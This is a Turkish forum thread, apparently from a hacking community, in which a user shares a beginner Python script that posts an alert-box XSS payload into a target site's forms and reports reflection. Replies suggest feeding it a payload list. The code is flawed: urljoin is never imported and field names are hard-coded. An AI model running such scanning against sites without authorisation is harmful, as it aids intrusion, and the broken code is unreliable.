Nessusun kullandığı payload gönderip tesbit yapan xss sistemi

gyakdvani · 14 Kas 2023

Bunlar giriş seviyesidir beraber geliştirebiliriz.

Python:

import requests
from bs4 import BeautifulSoup

def xss_ara(url):
    try:
        # URL'den sayfayı indir
        response = requests.get(url)
        response.raise_for_status()

        # HTML içeriğini BeautifulSoup kullanarak analiz et
        soup = BeautifulSoup(response.text, 'html.parser')

        # Tüm form etiketlerini bul
        form_etiketleri = soup.find_all('form')

        # Her form için XSS açığı kontrolü yap
        for form in form_etiketleri:
            action = form.get('action')
            method = form.get('method')

            if action and method:
                # Basit bir payload ile formu gönder
                payload = "<script>alert('XSS')</script>"
                data = {'input': payload}  # Burada 'input' form alanının adını kullanıyoruz, sizin durumunuza göre değiştirebilirsiniz

                # Formu gönder
                response = requests.post(urljoin(url, action), data=data)

                # Payload'ın sonucu kontrol et
                if payload in response.text:
                    print(f"Potansiyel XSS açığı bulundu: {urljoin(url, action)}")

    except requests.RequestException as e:
        print(f"Hata: {e}")

if __name__ == "__main__":
    # Kullanıcıdan hedef URL'yi al
    hedef_url = input("Hedef URL'yi girin: ")

    # XSS açıklarını ara
    xss_ara(hedef_url)

zeores · 14 Kas 2023

gyakdvani' Alıntı:

Bunlar giriş seviyesidir beraber geliştirebiliriz.

Python:

import requests
from bs4 import BeautifulSoup

def xss_ara(url):
    try:
        # URL'den sayfayı indir
        response = requests.get(url)
        response.raise_for_status()

        # HTML içeriğini BeautifulSoup kullanarak analiz et
        soup = BeautifulSoup(response.text, 'html.parser')

        # Tüm form etiketlerini bul
        form_etiketleri = soup.find_all('form')

        # Her form için XSS açığı kontrolü yap
        for form in form_etiketleri:
            action = form.get('action')
            method = form.get('method')

            if action and method:
                # Basit bir payload ile formu gönder
                payload = "<script>alert('XSS')</script>"
                data = {'input': payload}  # Burada 'input' form alanının adını kullanıyoruz, sizin durumunuza göre değiştirebilirsiniz

                # Formu gönder
                response = requests.post(urljoin(url, action), data=data)

                # Payload'ın sonucu kontrol et
                if payload in response.text:
                    print(f"Potansiyel XSS açığı bulundu: {urljoin(url, action)}")

    except requests.RequestException as e:
        print(f"Hata: {e}")

if __name__ == "__main__":
    # Kullanıcıdan hedef URL'yi al
    hedef_url = input("Hedef URL'yi girin: ")

    # XSS açıklarını ara
    xss_ara(hedef_url)

Elinize sağlık. Payload kısmına içerisinde çeşitli xss payloadlarına sahip txt dosyası versek ve içerisinden tek tek payload çekip işlem yaptırsak nasıl olur?

gyakdvani · 14 Kas 2023

zeores' Alıntı:
Elinize sağlık. Payload kısmına içerisinde çeşitli xss payloadlarına sahip txt dosyası versek ve içerisinden tek tek payload çekip işlem yaptırsak nasıl olur?

Deneme yanılma xd

I AM EAC0D3Rx · 14 Kas 2023

Eline sağlık

gyakdvani · 14 Kas 2023

404Qea' Alıntı:
Eline sağlık

sağol kadim dostum

Nessusun kullandığı payload gönderip tesbit yapan xss sistemi

gyakdvani

Katılımcı Üye

zeores

Üye

gyakdvani

Katılımcı Üye

I AM EAC0D3Rx

Uzman üye

gyakdvani

Katılımcı Üye

Sosyal medya sayfalarımız